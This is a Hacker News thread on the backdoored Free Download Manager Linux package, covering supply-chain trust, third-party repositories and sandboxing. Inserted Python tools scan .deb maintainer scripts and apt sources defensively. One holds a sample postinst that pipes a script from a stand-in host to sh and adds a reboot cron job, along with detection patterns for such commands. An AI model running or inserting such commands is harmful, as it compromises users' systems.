[HN Gopher] Free Download Manager backdoored - a possible supply...
___________________________________________________________________
Free Download Manager backdoored - a possible supply chain attack
on Linux
Author : donutshop
Score : 60 points
Date : 2023-09-12 19:46 UTC (3 hours ago)
(HTM) web link (securelist.com)
(TXT) w3m dump (securelist.com)
| codedokode wrote:
| This is one more reason to run every program in a sandbox rather
| than with full privileges.
| Obscurity4340 wrote:
| Should people reflexively refuse prompts to authenticate as
| admin and see if the underlying programs still work as
| expected? This comes up all the time for Macs and the keychain
| acatton wrote:
| I disagree. This is more another reason to not run programs
| which are not from the official repository.
| throwaway71271 wrote:
| why do you think this cannot happen in the official
| repository?
| acatton wrote:
| Because the official repository has a strict vetting
| process. You cannot just show up and put your shady
| software in the official repository.
|
| Debian packagers have a mutual trust process which you need
| to gain. Only trusted Debian packagers can approve packages
| to be included. Also some Debian maintainers will just
| randomly check packages from time to time. (e.g.
| https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=792580 )
| throwaway71271 wrote:
| the list of contributors is huge, you just need to hack
| one person https://contributors.debian.org/
|
| not to mention libraries like libxslt that is used by
| like half the packages
|
| even kernel.org was hacked, and git saved us, and luckily
| it was before the sha1 collision attacks were viable
|
| https://www.reddit.com/r/linux/comments/k0mco/kernelorg_c
| omp...
| https://crypto.stackexchange.com/questions/99767/how-
| easy-is...
| wfurney wrote:
| Nice classic email spam at the end of that thread!
|
| > "All we require from you is your willingness and
| ability to receive the funds in question"
| amenghra wrote:
| You can report the spam by clicking on the link at the
| very bottom (or just going to https://bugs-
| master.debian.org/cgi-bin/bugspam.cgi?bug=79258... and
| confirming).
| kelnos wrote:
| But Debian packagers aren't always super careful. They
| generally don't audit the full changeset between each
| version they package and publish. They mostly trust that
| upstream has not been compromised and continues to be
| trustworthy.
|
| I'm not trying to minimize all the hard work Debian (or
| any other distro) packagers do, but "only use official
| repositories" is not sufficient as a malware-avoidance
| strategy. Yes, it's better than installing random
| binaries from random websites, but let's not give
| ourselves a false sense of security.
|
| The suggestion upthread to run everything in a sandbox is
| a good one. I wish that was more common and that there
| was a better UX when doing so.
| [deleted]
| professor_m221 wrote:
| I see free. I download!
| NotYourLawyer wrote:
| If you intentionally install something called Free Download
| Manager, you should not be surprised when it turns out to be
| malware.
| mulmen wrote:
| Yeah who would ever trust a free BSD?
| DiabloD3 wrote:
| Why would you use a "Free Download Manager" when wget is right
| there? Or a web browser, such as Firefox? Or torrent clients to
| deal with large Linux ISO downloads? Or the various storefronts,
| like Steam? Or your own distro's package manager?
|
| This wasn't packaged on any distro, so this isn't even a
| meaningful attack: Users had to go out of their way to install it
| from a foreign source. This is no different than if you
| downloaded a random .exe and ran it on Windows with admin
| access.
|
| It's not a supply chain attack, it's a PEBKAC attack.
| ryandrake wrote:
| From their website[1]:
|
| > FDM can boost all your downloads up to 10 times, process
| media files of various popular formats, drag&drop URLs right
| from a web browser as well as simultaneously download multiple
| files!
|
| No, I still don't have a clue what it actually does that the OS and
| existing tools can't. It sounds like those scam "RAM doubler"
| programs from the 90s. Run this executable to _boost your
| system's chakras_.
|
| 1: https://www.freedownloadmanager.org
| [deleted]
| pixl97 wrote:
| Who uses a download manager in the days of high speed internet
| access and, in general, cloud services?
| sneak wrote:
| Download managers are _more_ important on high speed links than
| ever.
|
| The more bandwidth you have (and use), the less adequate the
| little "downloads" pane in your browser is.
| jandrese wrote:
| People who are still on dialup modems or very slow wireless
| ISPs with flaky connections. High Speed Internet is not
| universal even today, despite what web developers seem to
| think. Ever try to surf raw Facebook on a 128kbps wireless
| link? It's not fun. Cloud services are a joke for these people.
|
| Hacker News is one of the last holdouts in the low bandwidth
| friendly website game.
| OfSanguineFire wrote:
| A decade ago, I remember buying 500MB or 1GB of mobile
| internet credit and burning through that in an evening just
| reading news and stuff. Today, with uBlock Origin and
| NoScript, I can buy the same amount of mobile internet and it
| lasts me quite a while. I therefore concluded that, while
| website bloat does exist, what really consumes bandwidth is
| advertising, and that can be avoided. Moreover, a decade ago
| lazy loading of images was not common, but now the respective
| CSS tag exists, is supported by browsers, and widely
| implemented by CMSs like WordPress.
| blackhaz wrote:
| Happy FileZilla user here, on my FreeBSD laptop. I move tons of
| files from remote astronomical observatory routinely, sometimes
| need to define custom rules - what to download, upload, filter
| across folders, etc. Sometimes I need to push a file from very
| low data-rate link from somewhere in the middle of nowhere to
| the observatory, sometimes over a satellite link. Sometimes I
| want a throttled download of a large queue so I won't overload
| my connection and leave some bandwidth to other users. Also, I
| have a directory of different FTP servers I work with, it's
| easy to keep them in one place. So, there you have it.
| postmodest wrote:
| rsync has a --bwlimit option.
|
| But I suppose you're probably talking about devices that only
| know about internet protocols before 1991....
| jpc0 wrote:
| On linux...
|
| I mean if I found something called free download manager on a
| technologically challenged family member's PC I would just
| assume it's malware to start with.
| NoZebra120vClip wrote:
| Honestly, there were several download managers which were
| essentially forced by folks like Microsoft and Logitech. If I
| remember correctly, when I had an educational license with
| Microsoft Imagine, the most challenging bit was getting the
| mandatory download manager working. IIRC, I didn't actually
| have a Windows machine to put it on or something. So, I had
| to jump through some hoops. The software was plain
| inaccessible without going through the proprietary download
| manager.
|
| Logitech did similar hijinks for a long time. I can't
| remember whether it was mandatory, but it sure was difficult
| to avoid.
| aborsy wrote:
| Similar software is used in some products. For example,
| Synology DSM has a package called Download Station. Who knows
| if it's based on some obscure .deb (or scripts such as youtube-
| dl).
|
| It could give rise to a supply chain attack.
| bubblethink wrote:
| axel -n 10
| andersa wrote:
| They can be very useful for:
|
| - bypassing antiquated per connection throttles on otherwise
| fast servers by downloading chunks in parallel
|
| - downloading files such as videos from sites that don't really
| want you to download the file
|
| I have never heard of the program in the article, but this one
| still sees many active users on windows for the above reasons:
| https://jdownloader.org/
|
| There's even a little community still making and maintaining
| plugins for extracting files from uncooperative websites.
| Really does feel like the kind of program you only ever want to
| be running in a sandbox though!
| dataflow wrote:
| I do. Just because your internet access is fast that doesn't
| mean remote servers don't throttle on a per connection basis.
| pohuing wrote:
| Or that everyone else also has fast Internet
| vorpalhex wrote:
| It's really handy to be able to kick bigger or automated file
| operations to a backend service.
| [deleted]
| meepmorp wrote:
| I'm trying to imagine the kind of user that's both able to
| blindly install a random .deb downloaded from a website, while
| also being willing to do so. Linux geeks with no sense of
| danger on the internet?
| zem wrote:
| not too terribly different from `sudo (curl | bash)`
| lcnPylGDnU4H9OF wrote:
| One can google "install .deb fedora" and get a litany of web
| pages which will contain words explaining how to do this.
| Fedora (and other distributions) is easy enough to install
| that one doesn't really need to be a "Linux geek" in order to
| be on Linux and such a person is not quite so likely to
| wonder whether or not they trust the code they're running.
|
| Couple that with the fact that it works out well Most Of The
| Time[0] and you've got a pretty likely scenario even if it
| affects a relatively small number of people.
|
| [0] I mean in general when downloading software as well as in
| the context of this particular story[1].
|
| [1] > Starting in 2020, the same domain at times redirected
| users to the domain deb.fdmpkg[.]org, which served a
| malicious version of the app.
| lstamour wrote:
| If you have a web browser and Linux, you can often install a
| .deb just by opening it in Software Centre or other graphical
| utilities to install apps. The comparison might be someone on
| windows trusting a random .msi or installer .exe or someone
| on Mac installing a random .app package. It's somewhat normal
| these days. Package managers are sometimes harder to
| understand and app stores often don't have the app you want
| or the newest version. Sometimes the app directs you to the
| website to install an update - or updates itself from a
| compromised location.
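Whatever a .deb's data tarball contains, the maintainer scripts in its control tarball (preinst, postinst, prerm, postrm) run as root at install time, so they are the first thing to read before installing a package from an unknown website or repository. The script below is an added example, not code from the page or from the Free Download Manager project: it parses the .deb (an ar archive) with the standard library alone, pulls out the maintainer scripts and greps them for a few reviewer heuristics. The two sample packages, the tiny ar/tar builder and the SUSPICIOUS pattern set are all constructed here and are assumptions, not a vetted detection signature.

```python
"""Extract and grep the maintainer scripts of a .deb before installing it.

A .deb is an ar archive: debian-binary, control.tar.*, data.tar.*. The
preinst/postinst/prerm/postrm scripts in control.tar.* run as root at install
time, so they are the first thing to read. Added example; the minimal ar/tar
builder and both sample packages are constructed here, and the SUSPICIOUS
patterns are assumed reviewer heuristics, not a vetted signature set."""
from __future__ import annotations
import io
import re
import tarfile

MAINTAINER_SCRIPTS = {"preinst", "postinst", "prerm", "postrm"}
SUSPICIOUS = {                                   # assumption: tune to taste
    "network fetch": re.compile(r"\b(curl|wget)\b"),
    "piped to shell": re.compile(r"\|\s*(sudo\s+)?(ba)?sh\b"),
    "base64 decode": re.compile(r"base64\s+(-d|--decode)\b"),
    "persistence": re.compile(r"(/etc/cron|crontab|systemctl\s+enable|\.service\b)"),
    "exec from temp": re.compile(r"chmod\s+\+x\s+/(tmp|var/tmp|dev/shm)\b"),
}

def ar_members(blob: bytes):
    """Yield (name, data) for each member of an ar archive (BSD or GNU names)."""
    if not blob.startswith(b"!<arch>\n"):
        raise ValueError("not an ar archive")
    pos = 8
    while pos + 60 <= len(blob):
        hdr = blob[pos:pos + 60]
        if hdr[58:60] != b"`\n":
            raise ValueError("corrupt ar member header")
        name = hdr[:16].decode().rstrip().rstrip("/")
        size = int(hdr[48:58].decode().strip())
        yield name, blob[pos + 60:pos + 60 + size]
        pos += 60 + size + (size & 1)            # members are padded to even length

def maintainer_scripts(deb: bytes) -> dict[str, str]:
    """Return {script name: contents} from the package's control tarball."""
    for name, data in ar_members(deb):
        if name.startswith("control.tar"):
            with tarfile.open(fileobj=io.BytesIO(data), mode="r:*") as tar:
                return {m.name.rsplit("/", 1)[-1]: tar.extractfile(m).read().decode("utf-8", "replace")
                        for m in tar.getmembers()
                        if m.isfile() and m.name.rsplit("/", 1)[-1] in MAINTAINER_SCRIPTS}
    raise ValueError("no control.tar.* member")

def review_deb(deb: bytes) -> dict[str, list[str]]:
    """Map each maintainer script to the suspicious-pattern labels it matches."""
    return {name: [label for label, rx in SUSPICIOUS.items() if rx.search(body)]
            for name, body in maintainer_scripts(deb).items()}

# --- constructed sample packages (not real software) ------------------------
def _tar_gz(files: dict[str, bytes]) -> bytes:
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for name, body in files.items():
            info = tarfile.TarInfo("./" + name)
            info.size, info.mode = len(body), 0o755
            tar.addfile(info, io.BytesIO(body))
    return buf.getvalue()

def _ar(members: list[tuple[str, bytes]]) -> bytes:
    out = bytearray(b"!<arch>\n")
    for name, data in members:                   # 60-byte header, then data
        out += f"{name:<16}{0:<12}{0:<6}{0:<6}{'100644':<8}{len(data):<10}`\n".encode()
        out += data + (b"\n" if len(data) & 1 else b"")
    return bytes(out)

def build_sample_deb(postinst: str) -> bytes:
    control = (b"Package: example-dlm\nVersion: 1.0\nArchitecture: all\n"
               b"Maintainer: nobody <nobody@example.invalid>\nDescription: constructed sample\n")
    return _ar([("debian-binary", b"2.0\n"),
                ("control.tar.gz", _tar_gz({"control": control, "postinst": postinst.encode()})),
                ("data.tar.gz", _tar_gz({"usr/bin/example-dlm": b"#!/bin/sh\necho hello\n"}))])

BENIGN_POSTINST = "#!/bin/sh\nset -e\nupdate-desktop-database -q || true\n"
SHADY_POSTINST = ("#!/bin/sh\nset -e\ncurl -fsSL http://example.invalid/p.sh | sh\n"
                  "(crontab -l 2>/dev/null; echo '@reboot /tmp/.x') | crontab -\n")

if __name__ == "__main__":
    for label, script in (("benign", BENIGN_POSTINST), ("shady", SHADY_POSTINST)):
        print(label, review_deb(build_sample_deb(script)))
```

On a real system the same inspection is `dpkg-deb -e pkg.deb ctrl/` (or `dpkg-deb --ctrl-tarfile pkg.deb | tar -t`) followed by reading the scripts by hand; the heuristics above only decide which package deserves that read first, they do not replace it.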
| dang wrote:
| Url changed from
| https://arstechnica.com/security/2023/09/password-stealing-l...,
| which points to this.
|
| Submitters: " _Please submit the original source. If a post
| reports on something found on another site, submit the latter._ "
| - https://news.ycombinator.com/newsguidelines.html
| fortran77 wrote:
| But I thought there were no viruses or malware on Linux! For
| example: https://www.howtogeek.com/135392/htg-explains-why-you-
| dont-n...
| yjftsjthsd-h wrote:
| Look, if the malware spreads by users _manually installing it_
| , 1. it's not really an OS problem, 2. an AV wasn't going to
| save them.
| Gigachad wrote:
| That's how almost all malware was installed though. Linux
| really isn't any more resistant to malware than anything
| else.
| acatton wrote:
| This is installed by adding a shady repository to your apt
| sources.list...
|
| How is this a supply chain attack? My official Debian repository
| has never been breached so far.
|
| This is no different from downloading an .exe off a shady website
| and blindly running the .exe.
|
| Also:
| https://packages.debian.org/search?keywords=download+manager...
| lists:
|
| * uget: https://sourceforge.net/projects/urlget/
|
| * kget: https://apps.kde.org/en-gb/kget/
|
| * persepolis: https://persepolisdm.github.io/
|
| why use "Free Download Manager" when high quality ones are
| already officially packaged by Debian? Is this targeting
| newcomers from Windows?
| sva_ wrote:
| > This is installed by adding a shady repository to your apt
| sources.list...
|
| How is this possible? Aren't the packages signed like on
| ArchLinux so that you can use any mirrorlist?
| sudobash1 wrote:
| This is more like using AUR (except the packages are prebuilt
| with no way to inspect source). They are entirely user
| submitted.
| acatton wrote:
| No. This is not AUR, this is an _entire third party
| repository._ It would be the equivalent of these https://wi
| ki.archlinux.org/title/Unofficial_user_repositorie...
| acatton wrote:
| Yes, they are signed, but not with the official key. If you
| add it through the UI, it will auto-accept the key from the
| repository. (I'm not sure how it exactly works, it might ask
| the user for the confirmation)
|
| If you do it from the command line, by editing files, you
| will have to add the key manually.
|
| But most inexperienced users will just copy/paste and run the
| "curl | sudo apt-key add" command from the shady repository
| website, because they want to run the software.
|
| This is not much different from downloading an .exe from an
| untrusted website, and ignoring the warning from Windows when
| running the .exe.
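The distinction drawn above matters in practice: a key piped into `apt-key add` lands in apt's global trusted keyring and can then sign packages for every configured repository, whereas a `signed-by=` option (or a `Signed-By:` field in DEB822 `.sources` files) scopes the key to the one repository it was meant for. The audit below is an added example, not code from the page or from any distribution's tooling: it parses both apt source formats and flags third-party entries, entries without a scoped key, and plain-http entries. The sample source fragments and the OFFICIAL_HOSTS allowlist are constructed assumptions.

```python
"""Audit apt source entries for the pattern the thread describes: a third-party
repository whose key was added to the global trusted keyring.

Added example; the sources below are constructed, not taken from any real
system, and OFFICIAL_HOSTS is an assumed allowlist."""
from __future__ import annotations
import re
from dataclasses import dataclass

OFFICIAL_HOSTS = {"deb.debian.org", "security.debian.org"}   # assumption

@dataclass
class SourceEntry:
    url: str
    host: str
    signed_by: str | None = None   # keyring scoped to this repo via signed-by, if any

def _host(url: str) -> str:
    return re.sub(r"^[a-z+]+://", "", url).split("/", 1)[0].lower()

def parse_sources(text: str) -> list[SourceEntry]:
    """Parse one-line sources.list syntax or DEB822 .sources syntax."""
    entries: list[SourceEntry] = []
    if re.search(r"^URIs:", text, re.M):                 # DEB822 stanzas
        for stanza in re.split(r"\n\s*\n", text.strip()):
            fields = {}
            for line in stanza.splitlines():             # continuation lines (leading space) skipped
                if line and not line.startswith(("#", " ")) and ":" in line:
                    k, _, v = line.partition(":")
                    fields[k.strip().lower()] = v.strip()
            for url in fields.get("uris", "").split():
                entries.append(SourceEntry(url, _host(url), fields.get("signed-by") or None))
        return entries
    for raw in text.splitlines():                        # one-line format
        line = raw.strip()
        m = re.match(r"^(?:deb|deb-src)\s+(?:\[([^\]]*)\]\s+)?(\S+)", line)
        if not line or line.startswith("#") or not m:
            continue
        opts = dict(o.partition("=")[::2] for o in (m.group(1) or "").split())
        entries.append(SourceEntry(m.group(2), _host(m.group(2)), opts.get("signed-by") or None))
    return entries

def audit_sources(text: str) -> dict[str, list[str]]:
    """Return {url: [problem, ...]} for entries worth a second look."""
    findings: dict[str, list[str]] = {}
    for e in parse_sources(text):
        problems = []
        if e.host not in OFFICIAL_HOSTS:
            problems.append("third-party repository")
            if not e.signed_by:
                problems.append("no signed-by: key lives in the global trusted keyring "
                                "and can sign packages for every configured repository")
        if e.url.startswith("http://"):
            problems.append("plain http: index and packages fetched without TLS, "
                            "so the Release signature is the only integrity check")
        if problems:
            findings[e.url] = problems
    return findings

SAMPLE_ONE_LINE = """\
# constructed sample /etc/apt/sources.list
deb https://deb.debian.org/debian bookworm main
deb [arch=amd64 signed-by=/usr/share/keyrings/example-archive-keyring.gpg] https://example.com/deb stable main
deb http://deb.example.org/ stable main
"""

SAMPLE_DEB822 = """\
Types: deb
URIs: https://deb.debian.org/debian
Suites: bookworm bookworm-updates
Components: main
Signed-By: /usr/share/keyrings/debian-archive-keyring.gpg

Types: deb
URIs: https://vendor.example/deb
Suites: stable
Components: main
Signed-By: /etc/apt/keyrings/vendor.gpg
"""

if __name__ == "__main__":
    for sample in (SAMPLE_ONE_LINE, SAMPLE_DEB822):
        for url, problems in audit_sources(sample).items():
            print(url)
            for p in problems:
                print("  -", p)
```

Run it against the concatenated contents of /etc/apt/sources.list and /etc/apt/sources.list.d/*; the entries it flags with "no signed-by" are exactly the ones where a vendor's key, once added with `apt-key add`, could sign packages for every other repository on the box.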
| [deleted]
| baz00 wrote:
| Basically, as per everything these days, the entire software
| industry is based on "download and run any old shit off the
| Internet" with little to no fucks given about the source or
| trustworthiness or correctness. End users are no better because
| for most people, including a lot of novice Linux users, this
| isn't even considered as part of fixing or dealing with any
| particular problem. Cut / paste / job done.
|
| Worst is I've seen CI/CD systems which just pull unsigned
| unverified binaries off the internet and build software from
| github, random APT and YUM repos, all sorts of shit. This is
| then all thrown together and pushed into production systems.
| acatton wrote:
| It doesn't have to be. Corporations which are FedRAMP[1]
| compliant, have to build software reproducibly in a fully
| isolated environment, only from reviewed code.[2]
|
| [1] https://en.wikipedia.org/wiki/FedRAMP
|
| [2] https://slsa.dev/
___________________________________________________________________
(page generated 2023-09-12 23:00 UTC)